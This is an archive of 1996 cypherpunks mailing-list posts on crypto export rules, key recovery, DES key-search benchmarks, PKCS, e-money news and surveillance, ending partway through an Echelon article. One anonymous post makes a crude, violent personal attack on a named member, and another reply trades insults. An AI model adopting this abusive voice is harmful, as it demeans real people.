Message-ID: <199612131507.HAA06732@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Hal Abelson <hal@martigny.ai.mit.edu>
> Date:          Thu, 12 Dec 1996 15:29:25 -0500
> To:            cypherpunks@toad.com
> Subject:       Whom can you trust with your keys -- government version
> Reply-to:      hal@MIT.EDU

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> The Commerce Department draft crypto export regulations (see
> http://www.steptoe.com/commerce.htm) include the following stipulation
> on Key Recovery Agents:
> 
> 
>     Evidence of an individual's suitability and trustworthiness [to
>     act as a key recovery agent] shall include:
> 
> 	(i) Information indicating that the individual(s):
> 
> 	     (A) Has no criminal convictions of any kind or
> 	     pending criminal charges of any kind;
> 
> 	     (B) Has not breached fiduciary
> 	     responsibilities (e.g., has not violated any
> 	     surety or performance bonds); and
> 
> 	     (C) Has favorable results of a credit check;
> 	     or,
> 
>        (ii) Information that the individual(s) has an active
>        U.S. government security clearance of Secret or higher
>        issued or updated within the last five years.
> 
> It's nice to know that we can trust ex-cons, frauds, and deadbeats to
> hold our keys, provided that they have obtained a Secret clearance.

Sorry, but you're mistaken. There is an implied AND between (i) and
(ii), not an OR. 

Curiously, it looks like I may be eligible to run an GAK service.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 13 Dec 1996 10:17:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: ASM vs portable code [WAS: Re: Java DES breaker?]
Message-ID: <199612131527.HAA07125@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if this is a repeat - I got a rather
opaque 'delivery failure' message when I 
first sent it. - pt


Ray Arachelian <sunder@brainlink.com> wrote:
> On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > I happen to have a Sparc 20 box and a Linux box and a SCO box, and ActiveX
> > won't work on any of those. I also work with a bunch of other equipment
> > that's much faster than a PC, but doesn't run browsers. (Most of it is not
> > connected to the 'net for security reasons, but that's besides the point.)
> 
> Right, and Active X, if those machies were on the web, would not be 
> supported.
>  
> > If Bill's client is sure to run the platforms that MS IE runs on, then this is
> > not a consideration.
> 
> Correct, however there is one thing you have forgotten... (next paragraph)
> 
> > Interpreted FORTH bytestream (which is what Java is) may be "doing quite well"
> > when drawing GUI gizmos and widgets, but it can't get anywhere near the
> > performance of hand-optimizer assembler that you can stick into ActiveX.
> 
> While ActiveX does support hand optmized assembler, there are Java 
> JustInTime compilers which take JVM bytecodes and turn'em into raw 
> assembler.  They aren't hand optimized, they are natively compiled code, 
> but they are native code non the less.  A good optimizing compiler may 
> not be 100% as cool and as fast as hand optmized code, BUT it'll be 
> almost as fast.  And Java will run on just about EVERY platform out there.
> And that is a bigger, more important point than a 10%-25% increase in 
> power over non-optimized code.
> 
> Besides, I'm not arguing AGAINST an ActiveX client, there's no reason 
> why there can't be both Java and ActiveX clients out there since there is 
> both a compatibilty issue and a speed increase with ActiveX.

While I'm reluctant to ever find myself in the same corner as
Vulis, he has a point. As one of the few folks on this list who
actually writes code, I say that hand-optimized assembler will
beat machine generated code every time.

I have figures to back me up.

As some of you know, I've been working on a DES key recovery tool.
I'm have both portable C and x86 assembler versions. They
are currently identical, except that the guts of the DES round is 
written in "C" in one, and hand-optimized Pentium assembler in 
the other. 

For this test, I modified the code to cut out the delays associated 
with incrementing the key schedule (this is not in assembler yet, and
slows down the assembler version about 30%), leaving the of the 
crunching in the DES decryption. Both versions were compiled 
under Visual C++ 4.0, with Optimizations set to 'Maximize speed', 
and inlines to 'any suitable', and run on a 90MHz Digital 
Celebris 590 under WinNT 3.51.

Averaging several runs:

"C":   102,300 crypts/sec
ASM:   238,000 crypts/sec

With Java, it's possible to add native code methods to the 
interpreter, though it requires extra work by the user - 
it's harder than 'click on this link to run my reely 
kool applet'. This violates the Java sandbox, and requires 
the user to  make trust decisions on the methods they 
are adding.

ActiveX lets you add and run native code with a click, but
again involves trust decisions.

My philosophy is 'the more the merrier'. I'd like to see
able to people work on DES Key Recovery on a large number
of platforms and modes - we just need to standardize on 
the input and output formats.

Peter Trei
trei@process.com     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 13 Dec 1996 10:50:00 -0800 (PST)
To: cypherpunks
Subject: RSA Laboratories seeks contributions for the "next generation" of PKCS
Message-ID: <199612131849.KAA01675@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ray Sidney <ray@RSA.COM>
To: "'e-payment@bellcore.com'" <e-payment@bellcore.com>,
        "'firewalls@greatcircle.com'" <firewalls@greatcircle.com>,
        "'ietf-otp@bellcore.com'" <ietf-otp@bellcore.com>,
        "'ietf-pkix@tandem.com'" <ietf-pkix@tandem.com>,
        "'ipsec@ans.net'" <ipsec@ans.net>,
        "'www-security@ns2.rutgers.edu'" <www-security@ns2.rutgers.edu>
To: "'rsa-licensees@rsa.com'" <rsa-licensees@RSA.COM>,
        "'swan-dev@rsa.com'"
	 <swan-dev@RSA.COM>,
        "'smime-dev@rsa.com'" <smime-dev@RSA.COM>
Subject: RSA Laboratories seeks contributions for the "next generation" of PKCS
Date: Fri, 13 Dec 1996 10:07:47 -0800

Comments and suggestions are invited for the next generation of the
Public-Key Cryptography Standards, the intervendor specifications developed
starting in 1991 by RSA Laboratories in conjunction with industry and
universities.

The Public-Key Cryptography Standards were established to provide a
catalyst for interoperable security based on public-key cryptographic
techniques, and
they have become the basis for many formal standards and are implemented
widely. With several years' experience and review, and with many new
developments in cryptography since 1991, it is now time to update PKCS.

Suggestions are invited in the following areas:

    * improvements to the current suite of standards
    * contributions for new standards, including standards for transport and
      local storage of personal information such as private keys and
      certificates, and standards for platform-independent cryptographic
      programming interfaces

PKCS documents are low-level standards stating precisely how one may
accomplish specific cryptographic or cryptography-related tasks.  Most are
concerned with specifying byte-level recipes (often in ASN.1) for formatting
various types of data (such as a block which is to be RSA-encrypted), rather
than making general security-related recommendations ("An RSA modulus
should be at least XXX bits long.").

RSA Laboratories is actively soliciting suggestions and contributions
for the "next generation" of PKCS from now until the end of April 1997.  If
you have written up a document detailing extensions you've made to an
existing PKCS, and you feel that others could benefit from the use of your
extensions, then we'd like to see your document.  If you have an idea for a
new PKCS, we'd like to hear that, too.  And if you have something somewhere
in between, send it along; of course, detailed, well-developed contributions
are generally preferred.  Suggestions should be sent either to the
pkcs-tng@rsa.com mailing list (you can subscribe to this list by sending
email with "subscribe pkcs-tng" in the message body to majordomo@rsa.com;
unsubscribe with "unsubscribe pkcs-tng") or to pkcs-editor@rsa.com, whichever
is deemed more appropriate.

Current PKCS documents are:

PKCS #1: RSA Encryption Standard.
PKCS #3: Diffie-Hellman Key-Agreement Standard.
PKCS #5: Password-Based Encryption Standard.
PKCS #6: Extended-Certificate Syntax Standard.
PKCS #7: Cryptographics Message Syntax Standard.
PKCS #8: Private-Key Information Syntax Standard.
PKCS #9: Selected Attribute Types.
PKCS #10: Certificate Request Syntax Standard.
PKCS #11: Cryptographic Token Interface Standard (CRYPOKI).

The above documents are available from RSADSI's web site, and links to them
may be found at http://www.rsa.com/rsalabs/pubs/PKCS/.

All contributions received shall be examined, and, if appropriate, a workshop
(or several workshops) shall be held to further determine the content of the
"next generation" of PKCS.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Fri, 13 Dec 1996 11:38:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Enigma
Message-ID: <199612131923.LAA11742@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain


Tim C. Mayonnaise, a product of anal birth, appeared with a coathanger through 
his head.

      /\_./o__ Tim C. Mayonnaise
     (/^/(_^^'
    ._.(_.)_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Fri, 13 Dec 1996 10:14:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961213.104139.8391.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Agence France Presse: Tuesday, December 10, 1996
 
Visa to Launch Trial Electronic Money Services in Tokyo 
 
Visa International said Tuesday it would experiment with electronic money
services in central Tokyo [Shibuya district] for about 18 months from
June 1998 with Japanese commercial banks and credit card companies.
 
The US-headquartered international credit card firm said it would be the
world's largest experiment in terms of the size of participating
companies and cards to be issued. 
 
The project will be joined by five Japanese commerical banks -- Bank of
Tokyo-Mitsubishi Ltd., Dai-ichi Kangyo Bank Ltd., Fuji Bank Ltd.,
Sumitomo Bank Ltd., and Tokai Bank Ltd. 
 
Five Japanese credit card companies, including Credit Saison Co. Ltd. DC
Card Co., Sumitomo Credit Service Co., Million Card Service Co. and UC
Card Co., will also take part in the trial. 
 
Visa said it hoped to use the experiment to assess commercial feasibility
and
customer affordability before introducing full electronic money services.

 
Visa plans to install its electronic money terminals and issue more than
100,000 cards, including those with built-in integrated circuits, for the
experiment. 
 
Visa said it had already conducted an electronic money experiment in
Atlanta during the Summer Olympic Games. The company is also preparing to
try similar systems in Hong Kong and Australia.
 
 
 
American Banker: Thursday, December 12, 1996
 
REPORTER'S NOTEBOOK
 
Home Financial Network Offers Web Software
 
By DREW CLARK
 
The house lights dimmed and music started blaring. Smoke billowed out
from the stage and red-and-white lights flashed onto an audience of
thousands.
 
Despite the rock-concert atmosphere, complete with an emcee peering out
from giant video screens like a live-action "Max Headroom," most of the
audience in the Dallas Convention Center Arena was in suits. 
 
Welcome to Retail Delivery '96, the new-wave Bank Administration
Institute conference covering all that is new and exciting in financial
services technology. 
 
Having grown into banking's biggest convention, with more than 7,000
people and some 350 exhibiting companies, Retail Delivery made bold
promises. Promotional brochures said it would go "beyond the buzzwords." 
 
Frank Feather, the Canadian banking consultant in the Max Headroom role,
said the event would "unlock the secrets of how to make real money off
technology." 
 
When the "virtual" Mr. Feather introduced Robert W. Gillespie for the
keynote speech last Wednesday, the KeyCorp chief executive officer drew a
laugh from the audience by declaring: "This may be the way to start
shareholder meetings." 
 
Mr. Gillespie and the master of ceremonies were the first of a parade of
speakers referring to the dramatic change the industry is undergoing. Mr.
Gillespie captured the spirit by describing how his company, the "New
Key," is evolving in three directions: national consumer finance,
corporate banking, and community banking. 
 
His multimedia computer presentation took the audience through a virtual
branch and displayed video clips of KeyCorp executives including Steve
Cone, its renowned marketing strategist. Mr. Gillespie showcased a
marketing campaign so unified that the voice of Anthony Edwards, the
company's star ad spokesman, is also heard when consumers dial into
KeyCorp call centers. 
 
Branding is big in retail banking, nowhere more than at Banc One Corp.
The point was reinforced by Kenneth T. Stevens, chief executive of Banc
One Corp.'s retail group, who previously worked at Pepsico and its Taco
Bell subsidiary. 
 
"Strong brands get winning price-earning multiples," he said, which
translate into easier entry into new markets and the ability to resist
competitive  attacks.
 
"Historically, banks didn't need branding because of location," Mr.
Stevens said. "With the leveling of competition, the control of brand
names will be essential." 
 
He said banks' problems are typified by the jumble of logos on automated
teller machines -- a stark contrast to the clarity of Coke and Pepsi. 
 
Despite such doses of high-level retail strategy, technology held
center-stage. The enthusiasm about it was palpable, fueled by the
appearances of executives from the Silicon Valley companies Intel Corp.
and Sun Microsystems Inc. 
 
Generally admonishing the audience to get on the highway before it's too
late, both spoke to banking issues. Intel executive vice president Frank
Gill demonstrated remote banking with interactive video; Sun CEO Scott
McNealy was critical of bankers' willingness to turn technology
management over to others. 
 
"I can see a forestry company outsourcing information systems because
their assets are in the ground," Mr. McNealy said. "But a bank's assets
are information. Outsourcing (for banks) is a self-imposed lobotomy. It's
like Budweiser outsourcing beer manufacturing." 
 
At the closing session Friday, Mr. Feather came out from behind the big
screens to discuss his own keys to the future. Foremost, he said, is the
Internet -- "the biggest thing ever in human history. It is not a
technology,  but a socio-economic system changing the way we live." 
 
Yet some bankers still "don't get it," Mr. Feather said. They prefer to
think of the Internet as a passing fad, like the videophone, or an
important but slowly evolving technology. 
 
Referring -- though not by name -- to Citicorp chairman John Reed and his
prediction that full electronic banking would not be mainstream for 50 to
75 years, Mr. Feather dismissed it with a barnyard epithet. He suggested
Citicorp is just trying to throw its competition off-balance. 
 
Mr. Feather's counterprediction: Within 25 years, there will be no full-
service branches or tellers in North America. 
 
"Tens of thousands of branches will be closed, the entire distribution
system will be rationalized," he said.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aaron@herringn.com
Date: Fri, 13 Dec 1996 11:54:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Privacy] Airline background checks...
Message-ID: <l03010d04aed7637262a4@[204.57.198.5]>
MIME-Version: 1.0
Content-Type: text/plain



WASHINGTON (CNN) -- Under plans to overhaul the airline security system,
making a plane reservation would trigger an instant profile of a
passenger's background, including past travels and possible criminal
history information.

[...]

Government should pay

The committee, made up of 23 industry, government and public interest
groups, suggested the federal government, not the airline industry, pay for
the increased security measures. It estimated the proposals would cost $9.9
billion over the next 10 years.

"It's not an airline or airport problem. It's a national security problem,"
Lally said. "Airports and airlines are surrogate targets. The real targets
are the policies and government of the United States."

[...]

http://www.cnn.com/US/9612/13/airline/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Fri, 13 Dec 1996 13:22:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Wired Integrity
Message-ID: <199612132111.NAA14618@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain



The latest issue of Wired has a nice article about Sameer Parekh
and C2Net.

What is troubling is that it is written by Sandy Sandfort who
works at C2Net.  There is no indication of this in the vicinity
of the Wired article.

The Little Green Man






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 13 Dec 1996 13:23:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: From Houghton-Mifflin MIS regarding the ongoing self-mailbombing
Message-ID: <Pine.GUL.3.95.961213132117.16301C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A lesson in stupidity.

- -rich

[Forwards from impeccable intermediate sources snipped; if you REALLY need
to confirm, mail me.]

- ------- Forwarded Message

OK. I used to work in the MIS department of Houghton Mifflin, and still am
good friends with the upper MIS people. In fact I had dinner with them
last night.

Although the promotion is/was real, PLEASE DON'T SEND THEM ANY MORE
EMAIL. The mail gateway is throttling with the incoming mail - we had
a long talk last night over how to aleviate this problem. They've gotten
alittle over 100k messages in 1 week. The mail server is currently a SPARC 5
w/ 64MB RAM and a gigabyte of swap, and is so hosed that they're switching in
an Ultra2 tonight to try to handle the load.

The lesson here is: don't do a marketing ploy without first consulting
your Tech people. Apparently, the whole thing was cooked up by one of the
departments, who neglected to tell MIS.

Also, for those of you who might possibly work in industry in the
future and are looking for a way to gather email addresses or do some kind of
promotion like this, USE WEB HITS. The average email coming in to HMCo is 
about 4kb, requires disk space, and requires a vfork() of sendmail to deliver. A
typical Http hit runs less than 100bytes, is served by a threaded httpd
server, and requires very little disk access.

Anyway, this is just a note to please spare my friends at HMCo. The kids are
going to get all the donations promised, and my friends have enough headaches.

Thanks!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMrHJDJNcNyVVy0jxAQH98wH/RA2dc5bLz3KbX0JoyVha5+XoppMSgNtB
8MvVemU5iOeBRrJTENo1bj6OYx8b7ie8E95OUsBy9Kx0RpFfpOmBSA==
=QdmN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimg@mentat.com (Jim Gillogly)
Date: Fri, 13 Dec 1996 13:30:18 -0800 (PST)
To: peter.allan@aeat.co.uk
Subject: Re: Would you send money to Gary Rasmussen ?
Message-ID: <199612132135.NAA03111@zendia.mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I've sent Gary Rasmussen (RagyR, Classical Crypto Books) money
and received books.  He's prompt and honest, in my experience, and
even offered to refund my money on the latest edition of Kahn's "The
Codebreakers" when I pointed out that there's very little new info
in it (16 pages), and it's not integrated with the text, nor does
it include the copious footnotes that make the original so valuable.

I met him at the most recent American Cryptogram Association meeting,
and he was efficient and personable there as well.

In fact, I just sent him another $69.95 today for the Handbook of
Applied Cryptography -- the ACA member price.  His price breaks are
usually much deeper for ACA members; evidently the margin is lower
for modern low-volume professional texts like this than for the
classical ones I usually buy.

	Jim Gillogly
	jim@acm.org

> From: peter.allan@aeat.co.uk (Peter M Allan)
>    >    >  (And is there anyone I'd know who'd suggest I send you money ?!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 13 Dec 1996 14:26:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: In Defense of Anecdotal Evidence
Message-ID: <199612132226.OAA13677@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



Hats off to Rob Carlson for a great article!

At 9:54 AM 12/13/1996, Rob Carlson wrote:
>On Thu, 12 Dec 1996 14:12:23 -0800, Huge Cajones Remailer wrote:
>>Statistics are a useful tool, but they have their problems.  Their
>>accuracy is often in doubt.  Most scientific data comes with an
>>error analysis so you can tell what the figure means.  For some
>>reason statisticians never do this so we cannot tell whether their
>>numbers are accurate to within 0.1%, 1.0%, 10%, or even worse.
>>
>>There are many other problems.  For instance, users of statistics
>>assume they have a random sample, even in cases where that is far
>>from clear
>
>[ List of other problems deleted ]
>
>Of course, anecdotal evidence also suffers from all of these
>problems. And in greater magnitude. This is true since it is a
>special case of statistical evidence. With a non-random sample set of
>one and no controls for observer bias.

Excellent point.

On the other hand, if everybody operates correctly based on their own
(non-random) experience in general the right outcomes will occur.

This is rational if the tertiary statistical evidence is unreliable.
What you are implicitly assuming is that the studies one reads were
done honestly and competently.  Yet, the chain of evidence is rather
weak.  Typically, we don't even know the people who did the study.

Given the many contradictory results obtained by social statisticians,
we have substantial evidence that there is something wrong with their
methods or their application.

Another way to judge the experts is through selected in depth studies
of their work.  I have not found the results to be encouraging.

>>The advantage of anecdotal evidence (in the sense we have been using
>>it) is that the person who is telling you the anecdote was there and
>>saw it.  You can cross-examine them and get a full understanding of
>>the evidence provided.
>
>The reporting of evidence involves different issues. If you want to
>believe that women are actually cut in two or that politicians are
>telling the truth anytime their lips are moving, thats one thing. If
>you want to tell me its true because you personally observed it,
>thats quite another.
>
>Given the failures of humans as observational tools, your story is
>unverifiable by me.  Perhaps through effective cross examination I
>can prove you wrong, but I can never prove you right with such a
>technique.  That will require other evidence outside the control of
>the observer ( statistical is just one available ).

Occasionally we may teach somebody else about something they observed
and change their mind.  This is not the same thing as proof, but it
is worthwhile.

In other cases, we may have beliefs about the integrity of our
observer.  We may believe that they will not intentionally lie.  That
means we can separate out their interpretations from the exact details
they can recall.

Even if our correct interpretation is not accepted by the observer,
that does not imply that we can learn nothing of interest.

>This doesn't make studies or statistical evidence true. Just more
>reliable than anecdotal evidence.

I should make clear that I have not ruled out statistical evidence as
a tool.  We have to be aware of its limitations.

>Humans who will lie about their observations will also produce flawed
>studies. Again the former (anecdotal) is unverifiable, but I can
>check the latter (statistical) independently.

Actually, it is cheaper and easier to develop an understanding of the
reliability of anecdotal evidence.  Often we may have known the
observer for some time and be able to form theories about their
character and ability to accurately interpret what they have seen.

We can ask them what they saw on different occasions and see if we get
about the same story back.  We can think about whether the person has
intentionally lied in the past and, if so, under what circumstances.
We can ask ourselves what motivation the person might have to lie.
Is there any benefit to giving a particular story?

>Relying on anecdotal evidence makes you susceptible to the magicians
>of the world. The honest ones use mirrors and their need is to
>entertain you enough to get your money. The rest use anecdotal
>evidence and emotional arguments (verbal misdirection?). Their needs
>are left as a test of the reader's naivete.

What needs are satisfied by the white cloaked priests of social
science?  Which of their needs are satisfied by their work?  Very few
of these people are independent.  They are often paid by people whose
interest in the truth is in question.  That means that the temptation
to fudge (and humans find ways to rationalize such actions) is very
powerful.  The people preparing the statistical studies are often
interested in the fame associated with career advancement.  None of
this is conducive to the search for truth.

>Evidence that can be verified independently by many observers
>increases the reliability. Experiments and polls can be done by me
>thus eliminating your bias.  Independent verification can also check
>for errors and check the parameters under which the evidence is true.
>Studies are done with certain assumptions and controls. The evidence
>loses its reliability when removed from this context.

I have serious doubts about these methods.  I am not a statistician,
so there is a possibility that I am simply ignorant.

However, I would expect that if these methods of determining the
accuracy of the statistics were effective, that it would be possible
to provide some sort of error analysis.

When we get a figure for the GDP we know that it is highly unlikely to
be exactly correct.  What is the probability that it is low by 10%?  I
fail to see how the figure can even be useful without this
information.

In the case of a complex study involving the measure of biases to
adjust the final conclusions, it would be most useful to discuss the
probability that the bias was not measured correctly.  This must
surely affect our final results, especially when many biases and other
measurements are combined.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 13 Dec 1996 14:30:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITAR -> EAR; loss of First Amendment Rights.
In-Reply-To: <199612131951.LAA03511@toad.com>
Message-ID: <58sldn$ftp@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199612131951.LAA03511@toad.com>,
Peter Trei <trei@process.com> wrote:
>It appears that we will now have the unique
>situation that a book which contains cryptographic
>info or source code will be illegal to export or 
>sell to a non-citizen, without getting export permission.
>
>I am not aware of any prior time when the government
>attempted to claim that printed material, freely
>available in bookstores and newsstands to US citizens,
>became contraband when sold or given to a non-citizen.
>
>Who's responsible for enforcing this? The vendor? The
>clerk at Barnes & Noble? The publisher? If the latter,
>how many publishers will take the risk of printing 
>books with crypto information? Will Wiley pull "Applied
>Cryptography" from the shelves?

Part 744.9(c) of the draft regs:

# (c) Definition of U.S. person. For purposes of this section, the term
#     U.S. person includes: 
# 
#       (1) Any individual who is a citizen or permanent resident alien of
#           the United States; 
# 
#       (2) Any juridical person organized under the laws of the United States
#           or any jurisdiction within the United States, including foreign
#           branches; and 
# 
#       (3) Any person in the United States.

So it would be legal to sell books to foreigners in the US, unless that would
be "provid[ing] assistance to foreign persons" (744.9(a)).  Funnily enough,
"foreign person" isn't defined anywhere in http://jya.com/commerce.htm.
Is it safe to assume it means "a person who is not a U.S. person, as defined
in 744.9(c)"?  If that is the case, then teaching crypto classes to foreigners
in the US would be legal.

The new regs don't seem to have the exception for "mere travel outside of
the United States by a person whose personal knowledge includes technical
data" (ITAR, 120.17(1)).  Does that mean that such travel is now (or will
shortly be, when the new regs are enacted) illegal?  I find that hard to
believe (but I also find that virus checkers and firewalls are being
controlled hard to believe; hell, I find the whole crypto export policy
hard to believe).

   - Ian "heading back to Canada..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrHY70ZRiTErSPb1AQE0VAP/Sa1+s9n5k9V0ybt+xgMqd+lWLRNwsCES
y5tBaaU+BApEMrt96EPcvJe/YX5BwhFbKjxMaXjl5brtGe8J3UmgP04lBDlNfS4R
XwVqagG8yjmya7e0+/b0//WmFEn+KJCcU7y9HNi/OB4j7aWyB/7lPvSG9rPt2sua
13oBHLnoZIQ=
=j7sS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 13 Dec 1996 14:43:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: THE CRYPTOCRACY'S PLAN TO PSYCHOCIVILIZE YOU
In-Reply-To: <199612132057.VAA00967@basement.replay.com>
Message-ID: <v03007810aed78d1cadce@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:57 PM -0800 12/13/96, Anonymous wrote:
>http://www.nwlink.com:88/~dbader/

And I got tired of saying no to cookies.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brett Carswell <brettc@tritro.com.au>
Date: Thu, 12 Dec 1996 20:54:12 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Speaking of Redlining....
Message-ID: <c=AU%a=_%p=Tritronics_.Aust%l=TRI_NT5-961213045401Z-29@net.tritro.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>I am trying to get a ~35,000 car loan - so far EVERYONE has just 
>straight up told me I am too young (even though I make twice what these 
>people make :) )

Maybe it's your condescending shithead attitude towards people who make
less than you. :))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 13 Dec 1996 14:56:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Appropriate Topics for Cypherpunks
Message-ID: <199612132256.OAA19882@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 9:54 AM 12/13/1996, Rob Carlson wrote:
>To make this on topic, how does this apply to cryptography and
>crypto-politics? This issue is a foundation of our discussions here.
>Shall we accept anecdotal evidence such as the "If you only knew what
>we knew" arguments? What is more reliable: IPG's claims that their
>product is an OTP because they say it is or Bruce Schneier's book
>that can be used to point out the fallacy's in their claims?

I'm sure Rob Carlson already realizes this, but just in case let's be
very clear that a discussion of the value of anecdotal evidence is so
on topic to this list that it isn't funny.

We are talking about trust models.

The reason that the Net is a fundamental threat to the established
social order is that it will probably result in a worldwide change in
trust models.  For one thing, we are now learning just how venal and
corrupt the world leadership really is.  At the same time,
cross-border relationships and trust are flourishing.

The rise of anonymous identities raises the question of how we can
"trust" somebody we have never met.  This immediately leads to the
question of why we trust other people we haven't met, such as the
President, or scientists, or whomever.  It turns out our reasons for
"trusting" these people are not as solid as some of us once believed.

The attempts to crush strong cryptography - especially if it implies
anonymity with strong authentication - is an attempt to undermine the
trust developing between disparate groups of people.

And, in a sense, that is what politics has always been about: the
subversion of trust between groups of people so they can be played off
each other for the benefit of the few.

Back to what is appropriate to this list: What the cypherpunks is
suffering right now is not an excess of well written articles that are
off topic.  I suggest that anybody who feels very strongly that they
are not seeing articles of the appropriate content follow Rob
Carlson's example and show the rest of us how it is done.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 13 Dec 1996 11:51:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: ITAR -> EAR; loss of First Amendment Rights.
Message-ID: <199612131951.LAA03511@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Reading the proposed new rules, what disturbs
me most deeply is the statement:

- start quote - 

16. Section 734.7 is amended by revising paragraph (b) to read as
follows: 

734.7 Published information and software. 
                                          * * * * * 
(b) Software and information is published when it is available for
general distribution either for free or at a price that does not
exceed the cost of reproduction and distribution. See Supplement No. 1
to this part, Questions G(1) through G(3). Note that encryption
software controlled under ECCN 5D002 for "EI" reasons on the Commerce
Control List (refer to Supplement No. 1 to part 774 of the EAR) remain
subject to the EAR even when publicly available. Accordingly, such
encryption software in both source code and object code remains
subject to the EAR even if published in a book or any other writing or
media. 

- end quote - 

It appears that we will now have the unique
situation that a book which contains cryptographic
info or source code will be illegal to export or 
sell to a non-citizen, without getting export permission.

I am not aware of any prior time when the government
attempted to claim that printed material, freely
available in bookstores and newsstands to US citizens,
became contraband when sold or given to a non-citizen.

Who's responsible for enforcing this? The vendor? The
clerk at Barnes & Noble? The publisher? If the latter,
how many publishers will take the risk of printing 
books with crypto information? Will Wiley pull "Applied
Cryptography" from the shelves?

This doesn't just chill free speech, it dunks it in
liquid helium. It's difficult to think of clearer
case of prior restraint.

-----------------

Peter Trei
trei@process.com
Disclaimer: I am not speaking for my employer.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 13 Dec 1996 14:59:06 -0800 (PST)
To: cypherpunks
Subject: NSA/UKUSA Echelon: Exposing the Global Surveillance System
Message-ID: <199612132258.OAA06522@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know the truth of this, but I'm sure it will make
interesting reading.					-- John

Forwarded-By: Dale Amon as Operator <root@starbase1.gpl.net>
Forwarded-By: Steven Carlson <steve@isys.hu>
This message was forwarded through the Red Rock Eater News Service (RRE).

** Topic: #59 Exposing Global Surveillance System **
** Written 10:30 AM  Dec  3, 1996 by caq in cdp:covertaction **

EXPOSING THE GLOBAL SURVEILLANCE SYSTEM
by Nicky Hager

                 ------
The article as it apears in hard copy in the
magazine also includes the following sidebars:
--"NSA'S BUSINESS PLAN: GLOBAL ACCESS"
   by Duncan Campbell
--GREENPEACE WARRIOR: WHY NO WARNING?
        and
--NZ's PM Kept in the Dark
  by Nicky Hager

********Hager's book "secret Power"
       is available from CAQ for $33.*******
                -----------

IN THE LATE 1980S, IN A DECISION IT PROBABLY
REGRETS, THE US PROMPTED NEW ZEALAND TO JOIN A
NEW AND HIGHLY SECRET GLOBAL INTELLIGENCE
SYSTEM. HAGER'S INVESTIGATION INTO IT AND HIS
DISCOVERY OF THE ECHELON DICTIONARY HAS
REVEALED ONE OF THE WORLD'S BIGGEST, MOST
CLOSELY HELD INTELLIGENCE PROJECTS. THE SYSTEM
ALLOWS SPY AGENCIES TO MONITOR MOST OF THE
WORLD'S TELEPHONE, E-MAIL, AND TELEX
COMMUNICATIONS.

For 40 years, New Zealand's largest
intelligence agency, the Government
Communications Security Bureau (GCSB)   the
nation's equivalent of the US  National
Security Agency (NSA)   had been helping its
